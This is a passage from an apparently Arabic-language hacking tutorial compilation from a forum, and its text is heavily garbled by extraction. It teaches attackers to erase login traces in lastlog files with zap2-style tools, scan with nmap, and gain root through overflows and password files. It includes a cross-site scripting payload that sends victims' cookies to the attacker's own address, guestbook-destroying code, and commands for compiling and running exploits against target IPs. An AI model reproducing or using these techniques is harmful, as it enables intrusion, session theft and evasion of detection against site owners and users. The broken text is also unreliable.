ﻗﻢاﻻيﺑﻲاﻟﺬي د ﺧﻠ ﺖ ﻣﻨﻪ ..ﻗﻤ ﺖﺑﻬﺎﺑﺎﻟﺪ ﺧﻮ ل و ر
ﻗﻲاﻟ ﺮﺳﺎﻟﻪ ديﯾﻌﻨﻲ ﺳﯿﺎدﺗﻚﻟﻮ د ﺧﻠ ﺖﺑﺎﺳﻢ ﯾﻮزر وﺑﻌﺪﻛﺪهاﻟﯿﻮزر ده د ﺧ ﻞ ﺣﯿﻼ
usr/adm/lastlog/
var/adm/lastlog/
var/log/lastlog/
ﺘﻢ ..
ﻗﻊ ﻣﻬ ﻗﯿﻬﺎﻓﻲاي ﻣﻮ ﺘﺨﺪام lledو دي ﻣﻤﻜﻦﺗﻼ ﯾﻤﻜﻨﻚ ﻣﺴ ﺤﻬﻢﺑﺎﺳ
ﺘﺨﺪام ...
ﻗ ﺮاهﻟﻜﻲﺗﻌ ﺮ ف ﻃ ﺮﯾﻘﻪاﻻﺳ ﺑﯿﻜﻮن ﻣﻌﺎه ﻣﻠ ﻒﻟﻠﻤﺴﺎﻋﺪها
ﺘﻬﺎ
ﺘﺨﻠ ﻒ ﻋﻦ ذﻟﻚ ﻣﻌﻠﻮﻣﺎ تاﯾ ﻀﺎ ﯾﻤﻜﻨﻚازاﻟ ﺘﺨﺪام ftpﻟ ﺮﻓﻊاﻻدوا ت ﯾ
ﻓﻲ ﺣﺎﻟﻪاﺳ
ﺘﺨﺪام wtedو ﻫﻮ ﺷﺒﯿﻪﺑﺎﻻدهاﻟﺴﺎﺑﻘﻪ lled ﺑﺎﺳ
ﻣﺎذاﻟﻮ ﻃﺒﻘﻨﺎاﻻﻣ ﺮ whoوﻟﻘﯿﻨﺎ ﻣﻌﺎﻧﺎاﻟ ﺮوو ت ؟؟
sh-2.03$ who
root tty1 Sep 25 18:18
ﺘﺨﺪم zap2
ﻣﻤﻜﻦﻓﻲاﻟ ﺤﺎﻟﻪ دي ﻧﺴ
١ ٩١
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
: luser ﻟﻮاﺳﻤﻚ
.....
١ ٩٢
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$$$
اﻟﻜﺎﺗﺐArab VieruZ :
$$$$$$$$$$$$$$$
**-----------------------------------------------
**-----------------------------------------------
ﺘﻮﯾﺎﺗﻪ
ﺘﺢاﻟﻤﻠ ﻒ وﻋ ﺮ ض ﻣ ﺤ
ﻓ
**-----------------------------------------------
اﻣ ﺮ ﺣﺬ فاﻟﻤﻠ ﻒ f-rm :
ﻟ ﺤﺬ فاﻟﻤﺠﻠﺪاﻟﺬيﺗ ﺮﯾﺪ
**-----------------------------------------------
اﻣ ﺮاﻟﻨﺴ ﺦ i-cp :
١ ٩٣
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﺴﻤﯿﺔ ﻷﻋﺎدةاﻟ
**-----------------------------------------------
ﺘﺐ وﻟﻠ ﺤﺼﻮ ل ﻋﻠﻰ ﻣﻌﻠﻮﻣﺎ تاﻛﺜ ﺮﻷﻣ ﺮ ﻣﻦاﻷواﻣ ﺮ
ﻣﻼ ﺣﻈﺔ :ﻟﻤﻌ ﺮ فاﻟﻤﺰﯾﺪ ﻣﻦاواﻣ ﺮﻟﯿﻨﻜ ﺲﻗﻢﺑﺸ ﺮا ءاﻟﻜ
ﻛﻢﺑﻮ ﺿﻊاﻷﻣ ﺮﺛﻢ –help
ﻣﺜﺎ ل help--ls :
**-----------------------------------------------
**-----------------------------------------------
١ ٩٤
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
-٤ﻣﻜﺎناﻟﻔﻠﻮدراﻟﺬيﺗﻌﻤ ﻞ ﻋﻠﯿﻪاﻵن
**-----------------------------------------------
ﻫﻨﺎﺗﺄﺗﻲاﻟﻤﺸﻜﻠﻪ !!!
ﺘﻲاﺗﺒﻌﻬﺎاﻧﺎ ﺷﺨﺼﯿﺎ
ً ﺘﻌ ﺮ ضﺑﻌ ﺾاﻟﻄ ﺮ قاﻟ
ﺘ ﺤﯿﻠﻪ وﺳﻨﺴ
ﻟﻜﻦﻟﯿﺴ ﺖ ﻣﺴ
ـ txt.hacked ﺘﻄﯿﻊ ﻣﻨﻬﺎﺗ ﺤﻤﯿ ﻞاﻟﻤﻠ ﻒ ﻣﺜﺎ ل :ﺛﻐ ﺮةاﻟﻨﯿﻮكاﻟﻘﺪﯾﻤﺔ ﺣﻘ ﺖاﻟ -١اﯾﺠﺎدﺛﻐ ﺮةﺗﺴ
**-----------------------------------------------
ً و ﺣ ﺮﯾ ﺺ ﻗﻊ ذﻛﻲ ﺟﺪا ﻗﻊ ﻣﻌﯿﻦ وﻛﺎن ﺻﺎ ﺣﺐاﻟﻤﻮ ﺘ ﺮا ق ﻣﻮ-٢ﻟﻨﻔ ﺮ ضاﻧﻨﺎ ﻧ ﺮﯾﺪا ﺧ
ﻗﻊﻓﻲ ﻧﻔ ﺲاﻟﺴﯿ ﺮﻓ ﺮاو ﻋﻠﻰ ﺘ ﻀﯿﻔﺔ و ﻧ ﺤﺎو لاﻟﺒ ﺤﺚ ﻋﻦ ﻣﻮا ًﺗ ﺤﺪﯾﺪاﻟﺸ ﺮﻛﺔاﻟﻤﺴ ﻫﺬي ﻃ ﺮﯾﻘﻪﻗﺪﺗﻨﻔﻊاوﻻ
ﺘ ﻀﺎﻓﺔ ﯾﻜﻮن ﺻﺎ ﺣﺒﻬﺎ دﻟ ﺦ وﻧ ﺤﺎو ل ﻧﻠﻘﻰﺛﻐ ﺮة ﻧ ﺤ ﻤ ﻞ ﻣﻨﻬﺎاﻟﻤﻠ ﻒﻗ ﻞﻓﻲ ﻧﻔ ﺲ ﺷ ﺮﻛﺔاﻷﺳ اﻷ
**-----------------------------------------------
ﺘﻲﺗﺪﻋﻢاﻟﺒﻲاﺗ ﺶﺑﻲ.... ﻗﻊاﻟﻤﺠﺎﻧﯿﺔاﻟ -٣اﻟﻤﻮا
١ ٩٥
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$$$
اﻟﻜﺎﺗﺐArab VieruZ :
$$$$$$$$$$$$$$$
١ ٩٦
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$$$
اﻟﻜﺎﺗﺐArab VieruZ :
$$$$$$$$$$$$$$$
١ ٩٧
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$$$$$$
اﻟﻬﻜ ﺮاﻟﺨﺠﻮ ل:ﺘ ﺮﺟﻢﺑﻮاﺳﻄﺔ
ﻣ
$$$$$$$$$$$$$$$$$$
: اﻹﺳﻢ
أداةﻛﺸ ﻒ ﻋﻦاﻟﺸﺒﻜﺎ ت و ﻣﺎﺳﺢأﻣﻨﻲ- nmap
: اﻟﺨﻼﺻﺔ
اﻟﺨﯿﺎرا ت- أﻧﻮا عاﻟﻤﺴﺢ
: اﻟﻮ ﺻ ﻒ
ﺘﻘ ﺮﯾ ﺮ و ﻣﻌ ﺮﻓﺔاﻟﻤ ﻀﯿﻔﯿﻦﺻﻤﻢﻫﺬااﻟﺒ ﺮﻧﺎﻣ ﺞﻟﻜﻲ ﯾﺴﻤﺢﻟﻤﺪرا ءاﻟﻨﻈﺎم واﻷﻓ ﺮادﺑﻤﺴﺢ ﺷﺒﻜﺎ تﻛﺒﯿ ﺮة ﻟ
: وﺗﺪﻋﻢاﻹﻧﻤﺎب ﻋﺪدﻛﺒﯿ ﺮ ﻣﻦﺗﻘﻨﯿﺎ تاﻟﻤﺴﺢ ﻣﺜ ﻞ. وﻣﺎذا ﯾﻘﺪﻣﻮن ﻣﻦ ﺧﺪﻣﺎ ت
UDP
()TCP connect
(TCP SYN (half open
(ftp proxy (bounceattack
Reverse-ident
(ICMP (ping sweep
FIN
ACK sweep
Xmas Tree
SYN sweep
.and Null scan
: ﻣﺜ ﻞ.. ﺘﻘﺪﻣﺔ
ً ﻋﺪد ﻣﻦاﻟﻤﻤﯿﺰا تاﻟﻤ
اﻹﻧﻤﺎبﺗﻘﺪمأﯾ ﻀﺎ
١ ٩٨
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﻲأﺟ ﺮﯾ ﺖ ﻋﻠﯿﻬﺎ ﻋﻤﻠﯿﺔ ﺘﻲﺗﻮﺟﺪﻓﻲاﻵﻟﺔاﻟ ً ﻣﺎﺗﻜﻮن ﻋﻠﻰﻫﯿﺌﺔﻗﺎﺋﻤﺔﺑﺎﻟﺒﻮرﺗﺎ تاﻟﻤﻬﻤﻪاﻟ ﺘﺎﺋ ﺞاﻹﻧﻤﺎب ﻋﺎدةا
ﻧ
ً ﯾﻌﻄﯿﻨﺎاﻟﺒﻮرﺗﺎ ت وإﺳﻢاﻟﺨﺪﻣﺔ واﻟﻌﺪد واﻟ ﺤﺎﻟﺔ واﻟﺒ ﺮوﺗﻮﻛﻮ ل اﻟﻤﺴﺢ .واﻹﻧﻤﺎب داﺋﻤﺎ
ﺘﻮ ﺣﺔاو ﻣ ﺮﺷ ﺤﺔأو ﻏﯿ ﺮ ﻣ ﺮﺷ ﺤﺔ اﻟ ﺤﺎﻟﻪإﻣﺎأنﺗﻜﻮن ﻣﻔ
ﺘﻮ ﺣﺔﺗﻌﻨﻲأناﻵﻟﺔ ﺳﻮ فﺗﻘﺒ ﻞأيإﺗﺼﺎ لﺑﻬﺬااﻟﺒﻮر ت ﻣﻔ
ﺘ ﺮ )ﻣ ﺮﺷﺢ(أوأي ﻋﻘﺒﺔأ ﺧ ﺮىﺗﻐﻄﻲ ﻫﺬااﻟﺒﻮر ت وﺗﻤﻨﻊاﻹﻧﻤﺎب ﻣﻦ اﻟﻤ ﺮﺷ ﺤﺔﺗﻌﻨﻲأنﻫﻨﺎكﻓﺎﯾ ﺮوو لأوﻓﻠ
ًأو ﻻ
ﺘﻮ ﺣﺎﻣﻌ ﺮﻓﺔ ﺣﺎﻟﺔاﻟﺒﻮر تإذاﻛﺎن ﻣﻔ
ﺘ ﺮ ) ﻣ ﺮﺷﺢ(ﻏﯿ ﺮ ﻣ ﺮﺷﺢﺗﻌﻨﻲﺑﺄنﻫﺬااﻟﺒﻮر ت ﻣﻌ ﺮو فﻟﺪىاﻹﻧﻤﺎبﺑﺄﻧﻪ ﻣﻐﻠ ﻖ وﻻ ﯾﺒﺪوأنأيﻓﺎﯾ ﺮوو لأوﻓﻠ
ﺘﻬﻢإﻻﻓﻲ ﺣﺎﻟﺔ وا ﺣﺪة ﺗﺪ ﺧ ﻞﻓﻲ ﻣ ﺤﺎوﻟﺔاﻹﻧﻤﺎب واﻟﺒﻮرﺗﺎ ت ﻏﯿ ﺮاﻟﻤ ﺮﺷ ﺤﺔﻫﻲأﻏﻠﺐاﻟ ﺤﺎﻻ ت وﻻ ﯾﻤﻜﻦ ﻣﻌ ﺮﻓ
ﺘﻲأﺟ ﺮﯾ ﺖﻟﻬﻢ ﻋﻤﻠﺔاﻟﻤﺴﺢﻓﻲ ﺣﺎﻟﺔﺗ ﺮﺷﯿﺢ ،ﻫﻲأن ﯾﻜﻮن ﻣﻌﻈﻢاﻟﺒﻮرﺗﺎ تاﻟ
ﺘﺎﻟﯿﺔﻓﻲاﻟ ﺮﯾﻤﻮ ت ﺘﺨﺪﻣﻪﻓﻲاﻹﻧﻤﺎبﻓﯿﻤﻜﻦأن ﯾﺒﻠﻎ ﻋﻦاﻟ ﺤﺎﻻ تاﻟﻤﻤﯿﺰةاﻟ ﺘﻤﺎد ﻋﻠﻰاﻟﺨﯿﺎرا تاﻟ ﻤﺴ وﺑﺎﻹﻋ
ﻫﻮﺳ ﺖ :
ﺘﺨﺪماﻟﻨﻈﺎماﻟﻤﺴ
TCP sequencability
ﺘﺨﺪﻣﯿﻦاﻟﺬﯾﻦ ﯾﺸﻐﻠﻮناﻟﺒ ﺮاﻣ ﺞاﻟﻤﺮﺗﺒﻄﺔﺑﻜ ﻞﺑﻮر ت أﺳﻤﺎ ءاﻟﻤﺴ
أﺳﻤﺎ ءاﻟﺪيإنإس
وﺑﻌ ﺾاﻷﺷﯿﺎ ءاﻷ ﺧ ﺮى...
١ ٩٩
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$$$$$$
اﻟﻜﺎﺗﺐnetwork access :
$$$$$$$$$$$$$$$$$$
ﺘﻄﻌ ﺖاﻧﻚﺗ ﺤﺼ ﻞ
ﻃﯿﺐﻗﻢﺑﻌﻤ ﻞ ﻣﻠ ﻒاﺳﻤﻪ LMHOSTSﯾﻮﺟﺪﻓﯿﻪاﺳﻢ NetBiosﻟﻜ ﻞ ﻋﻨﻮان IPﺎﺳ
ﻋﻠﯿﻪ
٢ ٠٠
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
٢ ٠١
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$
اﻟﻜﺎﺗﺐtcp:
$$$$$$$$
ﺘﻄﻠﺒﺎ ت :
اﻟﻤ
ﺘﻤ ﻞ
وﻣﻦ وﺟﻬﺔ ﻧﻈ ﺮ ﺷﺨﺼﯿﺔاﻟﻤﺼﺎﯾﺐﻛﻠﻬﺎ ﻣﻦاﻟﺠﺎﻓﺎ ﺳﻜ ﺮﺑ ﺖ واﻟﻬ
==========================================================
ﺘﺨﺪم
ﻗﺔ ﻣﻌﻠﻮﻣﺎ ت ﻫﺎﻣﻪ ﻣﻦ ﺟﻬﺎزاﻟﻤﺴ
ﺘﻢﻓﯿﻬﺎ ﺳ ﺮ
ﺘﻰ ﯾ
*اﻓﻬﺎماﻟﻘﺎرئ ﻋﻦاﻟﻜﯿﻔﯿﺔاﻟ
ﺘﺨﺪﻣﯿﻦ
ﺘﻄﺎ فاﻟﺠﻠﺴﺔ ﻣﻦاﻟﻤﺴ
ﻗﺔاﻟﻜﻮﻛﯿﺰاوا ﺧ
ﺘﻢﻓﯿﻬﺎ ﺳ ﺮ
ﺘﻲﺗ
*اﻓﻬﺎماﻟﻘ ﺮا ء ﻋﻦاﻟﻜﯿﻔﯿﺔاﻟ
ﺘ ﺮا ق
ﺘﻄﯿﻊاﻟﻘﺎرئﺗﻮﺳﯿﻊ ﻣﺪا ﺧ ﻞاﻻ ﺧ
*ان ﯾﺴ
اﻟﻤﺸﻜﻠﺔ :
ﺘﺨﺪﻣﯿﻦ
ﻗﺔ ﻣﻌﻠﻮﻣﺎ ت ﺣﺴﺎﺳﺔ ﻣﻦاﻟﻤﺴ
ﺘﻐ ﻞﻓﻲاﻏ ﺮا ض ﺳﯿﺌﺔﻟﺴ ﺮ
اوﻗﺪﺗﺴ
٢ ٠٢
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
><SCRIPT/>malicious code<SCRIPT
>img>document.write('<script
؛><script/
"''<src="http://my_ip_address/'+document.cookie+
اﻧﻈ ﺮ ﻫﻨﺎ ورﻛﺰﻓﻲﻛﯿﻔﯿﺔ ﻋﻤ ﻞاﻟﻜﻮداﻧﻬﺎﻓﻘﻂ ﻋﻨﺪﻣﺎ ﯾﺼﻠﻚﺑﺎ ﺣﺪاﻟﻄ ﺮ قاﻟﻤﺬﻛﻮرهاﻋﻼه وﺗ ﻀﻐﻂ ﻋﻠﯿﻪ ﺳﯿﻨﻔﺬ
اﻟﺴﻜ ﺮﺑ ﺖ
ﻗﻊاوﻗﺪ ﯾﻜﻮن
وﻟﻠﺸ ﺮ حاﻛﺜ ﺮﻟﻨﻔ ﺮ ضاناﻟﺴﻜ ﺮﺑ ﺖ comment.cgiﺳﻜ ﺮﺑ ﺖ ﯾ ﺮﺳ ﻞ ﻣﻼ ﺣﻈﺎﺗﻚﻟﺼﺎ ﺣﺐاﻟﻤﻮ
ﺳﻜ ﺮﺑ ﺖﻟﻠﺒ ﺤﺚ
ﺘﺎﻟﻲ :
ﺘﻰاﻋﻘﺪاﻻﻣﻮراﻛﺜ ﺮ ﻻ ﺣﻆاﻟﻤﺜﺎ لاﻟ
وﺣ
٢ ٠٣
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﻗﻊا ﺧ ﺮ
ﺘﺨﺪﻣﺎﻓﻲادراج ﻣﻠ ﻒ ﻣﻦ ﻣﻮ
ﺘﺨﺪم ﻧﻔ ﺲاﻟﺴﻜ ﺮﺑ ﺖاﻟﺴﺎﺑ ﻖﻟﻜﻦﻫﺬهاﻟﻤ ﺮه ﻃﻮرهاﻛﺜ ﺮﻟﯿﻜﻮن ﻣﺴ
ﻫﻨﺎاﺳ
واﻟﺬي
ﺘﺼ ﺮ ب CSS
ﻗﻊاﻻﻣﻨﯿﻪﺗﺨ
ﻗﻊ واذاﻛﻨ ﺖﺗﻼ ﺣﻆﻓﻲاﻟﺴﯿﻜﯿﻮرﺗﻲﻓﻮﻛ ﺲاواﻟﻤﻮا
ﺘﺎ تاﻛﺜ ﺮ ﻣﻦ ﻣﻮاﻟﺴﻜ ﺮﺑ
ﺘﺼﺎر وﻫﻲا ﺧ
ﺘﺎﻟﯿﺔ
ﺘل scripting cross-siteوﻟﯿ ﺲ ل CASCADE style sheetsاياورا قاﻻﻧﻤﺎطاﻟﻤ
ﺘﺎﻟﯿﺔ
ﻗﺪ ﯾﺪ ﺧ ﻞﺑﺪ لاﻟﻮﺳﻢاو ﻋﻼﻣﺔاﻟﺴﻜ ﺮﺑ ﺖاي ﻣﻦاﻟﻮﺳﻮماﻟ
ﻗﺼﺪه
ﺘﻄﯿﻊاﻻنانﺗﻔﻬﻢ ﻣﺎا
ﺘﻜﻮﯾﺪاﻟﺴﺪاﺳﻲ ﻋﺸ ﺮ واﻟﯿﻮﻧﯿﻜﻮدﺗﺴ
ﺘﻪ ﻋﻦاﻟ
ﺘﺒ
اذاﻛﻨ ﺖﻗ ﺮا ت ﻣﺎﻛ
=========================================================
ﺘﻔﺎ ﺻﯿ ﻞ :
وﻟﻤﺰﯾﺪ ﻣﻦاﻟ
http://www.cert.org/advisories/CA-2000-02.html
http://www.perl.com/pub/a/2002/02/20/css.html
...
٢ ٠٤
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$
اﻟﻜﺎﺗﺐ:اﻟﻌﺒﻘ ﺮي
$$$$$$$$$$
ﻗﯿﻊ
ﺘﻢﺗﻌ ﺮﻓﻮن ﻃﺒﻌﺎﻛﯿﻔﯿﺔ ﻋﻤ ﻞﺗﻮ ﻛﻮد ﺻﻐﯿ ﺮ ﺟﺪاﺑ ﺤﺠﻤﻪ،ﻛﺒﯿ ﺮﺑﻘﺪرﺗﻪ ﻋﻠﻰﺗﺪﻣﯿ ﺮ ﺳﺠ ﻞاﻟﺰوارﺑﺎﻟﻜﺎﻣ ﻞ...اﻧ
ﺘﺪﻻ ل......واﻟﻨﻘﻄﻪاﻟﻤﻬﻤﻪ
ﻗﻊ -ﻃ ﺮﯾﻘﺔ ﺎﻷﺳ ﻗﻌﻚاﻟﺸﺨﺼﻲ-ﺗﻘﺪﯾ ﺮكﻟﻠﻤﻮ ﻓﻲ ﺳﺠ ﻞاﻟﺰوار،اﻷﺳﻢ-اﻷﯾﻤﯿ ﻞ -ﻣﻮ
ﻗﻊ؟؟؟؟؟؟؟ ﺘﺎﺑﺔﺗﻌﻠﯿﻘﻚ ﻋﻠﻰاﻟﻤﻮ وﻫﻲﻛ
ﺘﺐ:
ﺘﻌﻠﯿ ﻖ ...........ﻧﻘ ﻒ وﻧﻜ
ﺘﺎﺑﺔاﻟ
ﻧ ﺤﻦ ﺳﻮ ف ﻧ ﻀﻊﻛ ﻞ ﺷﻲ ﺣﺴﺐ ﻣﺎﻫﻮ ﻣﻄﻠﻮب وﻟﻜﻦ ﻋﻨﺪﻣﺎ ﻧﺄﺗﻲﻟﻜ
.
.
.
.
.
.
.
.
.
.
.
.
.
==================================================
ﻗﯿﻌﻚاﻋﻤ ﻞ
ﺘﺎﺑﺔاي ﺷﻲﺗ ﺮﯾﺪﻓﻲ ﻣﻜﺎن put your text here ....ﻮﻫﺬاﻛ ﻞ ﺷﻲ ....ﺑﻌﺪﺗﻮ ﯾﻤﻜﻨﻚﻛ
رﯾﻔ ﺮﯾ ﺶ ﻮاﻧﻈ ﺮ ﻣﺎذا ﺣﺼ ﻞ
ﻣﻼ ﺣﻈﻪ:
=====
ﺎﻟﻜﻮد ﻻ ﯾﻌﻤ ﻞ ﻣﻊﺑﻌ ﺾاﻧﻮا ع ﺳﺠ ﻞ ﺎﻟﺰوار؟!...
٢ ٠٥
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
٢ ٠٦
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
××××××××××××××××××××××××××××××××××××××××××××××
×××××××××××××××××××××××××××××××××××××××××××××
ﺘﺜﻤﺎرا ت :ﺘﻠﻔﻪ ﻣﻦاﻻﺳ -٣ﺎﻧﻮا ع ﻣﺨ
ﺘﺜﻤﺎرا ت ﯾﻜﻮنﻫﺪﻓﻬﺎ ﻫﻮ ﻣﻨ ﺤﻚ ﺎﻟ ﺮوو ت ﻋﻠﻰاﻟﺴﯿ ﺮﻓﯿ ﺮ ..ﻣﻌﻨﻰﻛﻠﻤﻪ روو تﻫﻮاﻟﻤﺪﯾ ﺮ ﻃﺒﻌﺎاﻟﻜﺜﯿ ﺮ ﻣﻦاﻻﺳ
ﺘﺒﻬﺎ ..ايﻟﻚﻛ ﻞاﻟﺼﻼ ﺣﯿﺎ ت ﻋﻠﻰ ﺎواﻻدﻣﯿﻦ ..ﻻ ﯾﻮﺟﺪايﻗﯿﻮد ﻋﻠﻰا ل commandsﺎﻟﻠﻲاﻟ ﺮوو ت ﯾﻜ
اﻟﺴﯿ ﺮﻓﯿ ﺮ
ﺘﻢ ﻣﻦ ﺧﻼ لاﻟﻌﺪﯾﺪ ﻣﻦاﻟﺜﻐ ﺮا ت ﻣﺜ ﻞﺛﻐ ﺮا تا ل http ,ﻮا ل BOFﻮ ﻮاﻟ ﺤﺼﻮ ل ﻋﻠﻰاﻟ ﺮوو ت ﯾﻤﻜﻦان ﯾ
ﻏﯿ ﺮﻫﺎ ..
ﺘﺎﺑﻪ ﻋ ﻞاﻟﻤﻠﻔﺎ ت و ﺘﻤﺪ ﻋﻠﻰ ﻃ ﺮﯾﻘﻪ ﻋﻤ ﻞاﻟﺜﻐ ﺮا ت ..ﻓﻬﻲﻗﺪﺗﻌﻄﻲﻟﻚ ﺻﻼ ﺣﯿﻪﻗ ﺮا ءه و ﺣﺬ ف ﻮاﻟﻜ ﻛﻬﺎﺗﻌ
اﯾ ﻀﺎ
ﺮﻓﻊ ﻣﻠﻔﺎ تاﻟﻰاﻟ ﺴﯿ ﺮﻓﯿ ﺮ ....
ﺎوﻗﺪﺗﻌﻄﻲﻟﻚ ﺎﻟﻜﻠﻤﻪاﻟﺴ ﺮﯾﻪ واﺳﻢاﻟﯿﻮزراﻣﺎﻓﻲ ﺻﻮره وا ﺿ ﺤﻪ ﻣﺜ ﻞاﻟﻤﻠ ﻒ config.incﺎو ﻣﺸﻔ ﺮه
ﺑﻤﻘﯿﺎس
DES/MD5 ...ﻛﻤﺎﻓﻲاﻟﻤﻠ ﻒ /etc/passwd ....ﻓﻲاﻧﻈﻤﻪاﻟﯿﻮﻧﯿﻜ ﺲ...
ﺑﺎﻟﻨﺴﺒﻪﻟﻠﺒﻔ ﺮاوﻓ ﺮﻓﻠﻮﻓﻬﻮ ﯾﺸﺒﻪاﻟﻰ ﺣﺪﻛﺒﯿ ﺮ ﻫﺠﻮما ل DoSﻮﻟﻜﻨﻪ ﻻ ﯾﺴﺒﺐ ﺿ ﺮرﻟﻠﺴﯿ ﺮﻓﯿ ﺮ ﻣﺜﻠﻤﺎ ﯾﺴﺒﺒﻪ
ﺘﻬﻲ داﺋﻤﺎ ﻫﺠﻮما ل DoSﺎﻟﻤﻬﻢاﻧﻪﻓﻲاﻏﻠﺐاﻻ ﺣﯿﺎن ﯾﻜﻮناﻟﺒﻔ ﺮ ﻋﺒﺎره ﻋﻦارﺳﺎ لاواﻣ ﺮﻟﻠﺴﯿ ﺮﻓﯿ ﺮﺗﻨ
ﺑﺎﻋﻄﺎﺋﻚ
ﺘﻘﺒﺎ لاﻟﺴﯿ ﺮﻓﯿ ﺮﻟﻜﻢ ﻫﺎﺋ ﻞ ﻣﻦاﻟﺪاﺗﺎﻓﯿﺆدياﻟﻰارﺑﺎكاﻟﺴﯿ ﺮﻓﯿ ﺮ..ﺻﻼ ﺣﯿﻪاﻟ ﺮوو ت ...و ﻫﺬاﺑﺴﺒﺐاﺳ
××××××××××××××××××××××××××××××××××××××××××××××××××
×××××××××××××××××××××××××××××××××
ﻗﻊ ﻣﻔﯿﺪهﻟﻠﺒ ﺤﺚ ﻋﻦاﻟﺜﻐ ﺮا ت ﻣﻦ ﺧﻼﻟﻬﺎ :
-٤ﻣﻮا
ﻗﻊ :ﺘﺜﻤﺎرا تاﻟﺠﺪﯾﺪهﻓﻲ ﻫﺬهاﻟﻤﻮاﯾﻤﻜﻨﻚاﻟﺒ ﺤﺚ ﻋﻦاﻻﺳ
packetstorm.securify.com /.securityfocus.com /www.insecure.org
http://rootshell.redi.tk/ﻮ ﻏﯿ ﺮﻫﺎاﺑ ﺤﺚ ﺳﻮ فﺗﺠﺪاﻟﻤﺰﯾﺪ ....(:
٢ ٠٧
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$$$$$
اﻟﻜﺎﺗﺐVoOoDa BE$T :
$$$$$$$$$$$$$$$$$
ﺎﻟﺒﺪاﯾﺔ:
txt. :
ﺘﻮﺑﺔ
ﺘﻮي ﻋﻠﻰ ﺳﻮرسﻛﻮدﻟﺒﻌ ﺾاﻟﺜﻐ ﺮا تاو اﻟﺒ ﺮاﻣ ﺞاﻟﻤﻜ وﯾﻌﻨﻲ ﻣﻠ ﻒ ﻣﻠ ﻒ ﻧﺼﻲ..ﻣﻦاﻟﻤﻤﻜﻦاي ﯾ ﺤ
ﺘﺨﺪاﻣﻬﺎ.. ﺘﻌ ﺮ فﻛﯿﻔﯿﺔاﺳ ﺑﺎﻟﺴﻲ ،اﻟﺒﯿ ﺮ..اﻛﻤ ﻞاﻟﻘ ﺮا ءةﻟ
><><><><><><><><
c. :
ﺘ ﺮ ض ﻋﻠﯿﻚ ﺘﻬﺎﺑﺎﻟﺴﻲ..ﻫﺬا ﯾﻔﺘﺎﺑ
ﺘﻢﻛ
ﻫﻮﺑ ﺮﻧﺎﻣ ﺞ ﺳﻲﻟﻜﻨﻪ ﺳﻮرسﻛﻮدﻓﻘﻂ..واﻏﻠﺐاﻟﺜﻐ ﺮا ت ﯾ
ﻋﻠﯿﻚﺗ ﺤﻤﯿﻠﻪﺛﻢ ﻋﻤ ﻞ )_ (compileوﻫﺬا ﯾﻌﻨﻲﺗ ﺤﻮﯾ ﻞاﻟﺴﻮرسﻛﻮدﻟﻤﻠ ﻒ )ﺑ ﺮﻧﺎﻣ ﺞ(_ﺛﻢﺗﺜﻮم
ﺘﺸﻐﯿﻠﻪ...ﻟﻜﻦاﻟﻤﺸﻜﻠﺔﻫﻨﺎاﻧﻪﻟﻦ ﯾﻤﻜﻦﺗﺸﻐﯿﻠﻬﺎﺗ ﺤ ﺖﺑﯿﺌﺔ وﯾﻨﺪوز..ﻓﯿﺠﺐان ﯾﻜﻮن ﻋﻨﺪك Linuxاو ﺑ
.. Shell Account
ﺘﺐ: ﺘ ﺤﻤﯿ ﻞﺗﻮﺟﻪﻟﻠﻤﺴﺎراﻟﻤﻮﺟﻮدﺑﻪاﻟﻤﻔ ﻞﺛﻢاﻛ ﺑﻌ ﺾاﻟ
>---- gcc filenmae.cاﻣ ﺮاﻟﻜﻮﻣﺒﺎﯾ ﻞ
ﺘ ﺞاﻟﻤﻠ ﻒ: ﺳﯿﻨ
>--- a.outوﻫﻮاﻟﺒ ﺮﻧﺎﻣ ﺞاﻟﻨﺎﺗ ﺞ..
ﻛﻤﺜﺎ ل:
a.out xxx.xxx.xxx.xxx/.
ﺘﻮﺑﺔﺑﺎﻟﺒﯿ ﺮ ل: ﻟﻠﺜﻐ ﺮا تاﻟﻤﻜ
><><><><><><><><
pl. :
ﺘﺎج Linuxاو Shell Account ﺘﺸﻐﯿﻠﻪاﯾ ﻀﺎﺗ ﺤ ﺑ ﺮﻧﺎﻣ ﺞﺑﯿ ﺮ ل..ﻟ
ﺘﺐ:
ﻗﻊاﻛ اذاﻛﺎن exploitوارد تانﺗﻄﺒﻘﻪ ﻋﻠﻰ ﻣﻮ
perl filename.pl xxx.xxx.xxx.xxx
او
filename xxx.xxx.xxx.xxx/.
><><><><><><><><
...
٢ ٠٨
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$
اﻟﻜﺎﺗﺐDeadLine:
$$$$$$$$$$$$$
اﻟﺸ ﺮ ح :
ًاﻟﺜﻐ ﺮه ﯾﺎأ ﺧﻮانﺗﻄﺒ ﻖ ﻋﻠﻰ ﺳﯿ ﺮﻓ ﺮا ت :
ﺎوﻻ
Microsoft-IIS/5.0 on Windows 2000
ﺘﻠﻚ
